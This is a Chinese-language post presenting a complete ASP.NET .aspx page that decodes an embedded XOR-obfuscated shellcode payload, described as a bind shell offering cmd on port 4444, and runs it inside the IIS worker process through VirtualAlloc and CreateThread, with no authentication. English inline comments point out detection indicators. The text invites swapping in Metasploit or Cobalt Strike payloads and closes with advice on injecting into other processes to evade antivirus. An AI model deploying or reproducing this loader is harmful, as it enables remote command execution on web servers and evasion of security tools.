
在asp.net + iis + windows环境中,由于asp.net可以运行C#代码,可以通过pinvoke调用系统函数来将shellcode直接注入iis宿主进程(w3wp.exe)或者其他进程(如果权限足够)。

直接将shellcode载入w3wp.exe的代码,自带的shellcode为监听4444端口并在该端口提供cmd shell,可自行生成其他shellcode替换,实测包括msf生成的正反向shell,cs生成的payload等均不需要调用WaitForSingleObject等待其执行。

代码

<%@ Page Language="C#" %>
<%@ import Namespace="System"%>
<%@ import Namespace="System.Runtime.InteropServices"%>
<script language="c#" runat="server">
// P/Invoke declarations for the two Win32 calls used by Page_Load below.
// VirtualAlloc is invoked there with flAllocationType 0x1000 (MEM_COMMIT) and
// flProtect 0x40 (PAGE_EXECUTE_READWRITE): a private writable+executable region
// inside the IIS worker process (w3wp.exe). RWX private memory in a web worker
// is a high-signal indicator for memory scanners and EDR allocation telemetry.
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
// CreateThread is invoked with lpStartAddress pointing into that region, so the
// decoded bytes run as a new thread of w3wp.exe under the app-pool identity.
// A thread whose start address is not backed by any loaded module image is the
// artifact defenders should look for; the returned handle is never closed.
[DllImport("kernel32")]
private static extern IntPtr CreateThread(uint lpThreadAttributes,uint dwStackSize, IntPtr lpStartAddress,IntPtr param, uint dwCreationFlags, ref uint lpThreadId);
// Repeating-key XOR. Output byte i is cipher[i] ^ key[i mod key.Length]; the
// operation is its own inverse, so the same call encodes and decodes. Page_Load
// uses it to recover the embedded byte array from its obfuscated form.
private static byte[] xor(byte[] cipher, byte[] key){
    byte[] plain = new byte[cipher.Length];
    int pos = 0;
    while (pos < cipher.Length){
        byte keyByte = key[pos % key.Length];
        plain[pos] = (byte)(cipher[pos] ^ keyByte);
        pos++;
    }
    return plain;
}
// Runs on every request to this page, with no authentication, parameter or
// origin check of any kind: decodes the embedded byte array, copies it into
// newly allocated executable memory inside the IIS worker process, starts a
// thread at that address, and writes the thread handle into the HTTP response.
// In effect this is an in-process shellcode loader hosted as an .aspx page.
public void Page_Load(object sender, EventArgs e){
// XOR-encoded payload (505 bytes). The surrounding article describes the decoded
// bytes as a bind shell on TCP 4444 serving cmd; nothing in this code verifies
// that, so treat the content as opaque and the encoding as trivially reversible.
byte[] esc = new byte[505] {
0x88,0x2D,0xF0,0x90,0x9B,0x8D,0xB9,0x74,0x65,0x73,0x35,0x3A,0x24,0x29,0x26,0x34,0x25,0x3C,0x5A,0xB7,0x1C,0x3C,0xEE,0x21,0x14,0x23,0xEE,0x2B,0x6C,0x2D,0xF8,0x26,0x4B,0x2D,0xF2,0x06,0x35,0x3B,0x7B,0xDC,0x2F,0x33,0x39,0x54,0xBA,0x3C,0x5A,0xA5,0xD5,0x48,0x04,0x0F,0x76,0x47,0x45,0x38,0xB5,0xAC,0x7E,0x35,0x6A,0xA4,0x9B,0x99,0x37,0x32,0x25,0x23,0xEE,0x2B,0x54,0xEE,0x31,0x48,0x23,0x64,0xA9,0xFF,0xE5,0xFB,0x74,0x6B,0x65,0x31,0xF1,0xA5,0x07,0x13,0x23,0x64,0xA9,0x24,0xEE,0x3B,0x6C,0x2F,0xEE,0x39,0x54,0x2C,0x72,0xA4,0x88,0x33,0x31,0x8B,0xAC,0x32,0xFF,0x5F,0xED,0x31,0x75,0xB3,0x3E,0x45,0xA2,0x2D,0x48,0xB4,0xC9,0x32,0xB5,0xA2,0x68,0x38,0x75,0xA4,0x4B,0x94,0x1E,0x94,0x35,0x77,0x29,0x57,0x7C,0x2E,0x5C,0xA8,0x01,0xBD,0x2B,0x30,0xE0,0x25,0x5D,0x3D,0x64,0xA3,0x12,0x2A,0xEE,0x75,0x3C,0x21,0xF8,0x34,0x77,0x2C,0x78,0xA4,0x24,0xF8,0x70,0xE3,0x2D,0x78,0xA4,0x24,0x2B,0x35,0x33,0x3B,0x20,0x2E,0x24,0x2B,0x35,0x32,0x24,0x23,0x3C,0xE6,0x9F,0x54,0x2A,0x37,0x86,0x94,0x3D,0x32,0x2D,0x31,0x2D,0xF2,0x66,0x8C,0x24,0x8B,0x94,0x9A,0x24,0x3D,0xDB,0x04,0x07,0x59,0x3A,0x4A,0x46,0x65,0x73,0x35,0x3D,0x2C,0xF0,0x92,0x2D,0xF2,0x98,0xCB,0x64,0x79,0x74,0x2C,0xFA,0x91,0x22,0xD9,0x7B,0x74,0x74,0x2F,0x74,0x6B,0x65,0x79,0x35,0x31,0x3A,0xFD,0x8F,0x29,0xF0,0x85,0x24,0xC9,0x38,0x1C,0x43,0x7E,0x8B,0xB0,0x3F,0xFD,0x81,0x0D,0x78,0x75,0x65,0x73,0x2D,0x2A,0xDF,0x50,0xF4,0x0E,0x73,0x8B,0xBE,0x35,0x29,0x39,0x54,0xBA,0x39,0x5A,0xA5,0x31,0x8B,0xA5,0x3B,0xFD,0xA9,0x2D,0x86,0xB4,0x2D,0xFA,0xB5,0x2A,0xDF,0x93,0x7B,0xBA,0x93,0x8B,0xBE,0x2D,0xF0,0xB3,0x0F,0x63,0x35,0x33,0x29,0xF0,0x96,0x2D,0xFA,0x8D,0x2A,0xDF,0xBB,0xAF,0x52,0x14,0x8B,0xBE,0x2D,0x48,0xA6,0x2D,0xFA,0x8D,0x2A,0xDF,0xCE,0x9D,0x5D,0x8C,0x8B,0xBE,0x28,0x48,0xB4,0x2D,0x42,0xA6,0x23,0xEC,0x80,0x35,0xDF,0x07,0x98,0x50,0x84,0x86,0xA1,0x2D,0xFA,0x8D,0x23,0xEC,0xBE,0x35,0xDF,0x06,0x1A,0x26,0x04,0x86,0xA1,0x2D,0xF2,0xB0,0xCB,0x67,0x79,0x74,0x2C,0xCB,0x17,0x06,0x01,0x79,0x74,0x65,0x73,0x74,0x2A,0x35,0x38,0x24,0x2D,0xFA,0x96,0x3C,0x32,0x2E,0x39,0x54,0xB3,0x1E,0x66,0x3C,0x38,0x24,
0x87,0x8F,0x12,0xAC,0x21,0x5D,0x20,0x64,0x72,0x3C,0xE6,0x21,0x5D,0x6C,0xA3,0x73,0x1C,0x23,0xEC,0x9F,0x22,0x35,0x32,0x24,0x2A,0x35,0x38,0x24,0x2C,0x8C,0xB4,0x2A,0x35,0x30,0x8B,0xAD,0x3E,0xFD,0xAA,0x29,0xF0,0xB5,0x24,0xC9,0x0D,0xA7,0x5A,0xFF,0x8B,0xB0,0x3B,0x45,0xB9,0x2D,0x86,0xBE,0xEE,0x7D,0x35,0xD1,0x6D,0xFE,0x69,0x05,0x8C,0xA1,0xD0,0x95,0xCC,0xD6,0x33,0x32,0xCE,0xCD,0xF0,0xC4,0xE9,0x9A,0xA6,0x3C,0xE8,0xA1,0x51,0x48,0x63,0x0F,0x7E,0xEB,0x9E,0x99,0x01,0x60,0xC8,0x33,0x78,0x17,0x16,0x1E,0x65,0x2A,0x35,0xE2,0xBF,0x86,0xA1 };
// The key bytes spell the ASCII string "testkey" and sit in the clear next to the
// data, so the encoding hides nothing from anyone who can read the page source.
byte[] sc = xor(esc, new byte[7] { 0x74, 0x65, 0x73, 0x74, 0x6B, 0x65, 0x79 });
// 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE: a private RWX region in
// w3wp.exe. The return value is not checked; a NULL result is presumably
// surfaced as an exception from Marshal.Copy rather than handled.
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x1000, 0x40);
Marshal.Copy(sc, 0, funcAddr, sc.Length);
IntPtr hThread = IntPtr.Zero;
uint threadId = 0;
// pinfo only ever holds Zero: the new thread receives a null parameter.
IntPtr pinfo = IntPtr.Zero;
// Starts a thread at the RWX buffer, i.e. executes the decoded bytes in-process.
// A NULL handle (failure) is not checked and the handle is never closed.
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
// The raw handle value is echoed into the response body, so each request to this
// page leaves an artifact in the HTTP response and in any proxy/web log that
// captures bodies.
Response.Write("CreateThread: 0x" + hThread.ToString("x2") + "<br>");
return;
}
</script>

备注

如果权限足够,还可以对代码稍加修改,加上OpenProcess配合VirtualAllocEx、CreateRemoteThread函数,直接将shellcode注入到其他进程,以规避杀软经常采取的“限制w3wp进程启动其他程序”的措施。
